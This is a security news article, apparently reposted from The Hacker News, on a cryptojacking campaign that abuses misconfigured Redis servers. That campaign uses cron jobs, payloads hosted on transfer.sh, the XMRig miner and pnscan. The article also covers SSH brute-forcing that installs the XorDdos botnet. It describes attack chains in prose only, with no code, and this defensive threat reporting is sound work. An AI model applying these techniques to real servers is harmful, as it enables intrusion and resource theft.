Your Yello Ring Road To Success
GOOGLE LOGIN MY ADS MY SHOP

New Cryptojacking Campaign Leverages Misconfigured Redis Database Servers

Mar 02, 2023Ravie LakshmananData Security / Cryptojacking

Cryptojacking

Misconfigured Redis database servers are the target of a novel
cryptojacking campaign that leverages a legitimate and open source
command-line file transfer service to implement its attack.

“Underpinning this campaign was the use of transfer[.]sh,” Cado
Security said[1]
in a report shared with The Hacker News. “It’s possible that it’s
an attempt at evading detections based on other common code hosting
domains (such as pastebin[.]com).”

The cloud cybersecurity firm said the command line interactivity
associated with transfer[.]sh has made it an ideal tool for hosting
and delivering malicious payloads.

The attack chain commences with targeting insecure Redis
deployments, followed by registering a cron job[2] that leads to arbitrary
code execution when parsed by the scheduler. The job is designed to
retrieve a payload hosted at transfer[.]sh.

It’s worth noting that similar[3]
attack mechanisms[4]
have been employed by other threat actors like TeamTNT and WatchDog
in their cryptojacking operations.

The payload is a script that paves the way for an XMRig
cryptocurrency miner, but not before taking preparatory steps to
free up memory, terminate competing miners, and install a network
scanner utility called pnscan to find vulnerable Redis servers and
propagate the infection.

“Although it is clear that the objective of this campaign is to
hijack system resources for mining cryptocurrency, infection by
this malware could have unintended effects,” the company said.
“Reckless configuration of Linux memory management systems could
quite easily result in corruption of data or the loss of system
availability.”

The development makes it the latest threat to strike Redis
servers after Redigo[5]
and HeadCrab[6]
in recent months.

The findings also come as Avertium disclosed[7]
a new set of attacks in which SSH servers are brute-forced to
deploy the XorDdos botnet[8]
malware on compromised servers with the goal of launching
distributed denial-of-service (DDoS) attacks against targets
located in China and the U.S.

The cybersecurity company said it observed 1.2 million
unauthorized SSH connection attempts across 18 honeypots between
October 6, 2022, and December 7, 2022. It attributed the activity
to a threat actor based in China.

42% of those attempts originated from 49 IP addresses assigned
to ChinaNet Jiangsu Province Network, with the rest emanating from
8,000 IP addresses scattered all over the world.

“It was found that once the scanning identified an open port, it
would be subject to a brute-force attack against the ‘root’ account
using a list of approximately 17,000 passwords,” Avertium said.
“Once the brute-force attack was successful, a XorDDoS bot was
installed.”

Found this article interesting? Follow us on Twitter [9]
and LinkedIn[10] to read more exclusive
content we post.

References

  1. ^
    said
    (www.cadosecurity.com)
  2. ^
    cron
    job     (en.wikipedia.org)
  3. ^
    similar
    (unit42.paloaltonetworks.com)
  4. ^
    attack
    mechanisms     (www.cadosecurity.com)
  5. ^
    Redigo
    (thehackernews.com)
  6. ^
    HeadCrab
    (thehackernews.com)
  7. ^
    disclosed
    (www.avertium.com)
  8. ^
    XorDdos
    botnet     (thehackernews.com)
  9. ^
    Twitter
     (twitter.com)
  10. ^
    LinkedIn
    (www.linkedin.com)

Read more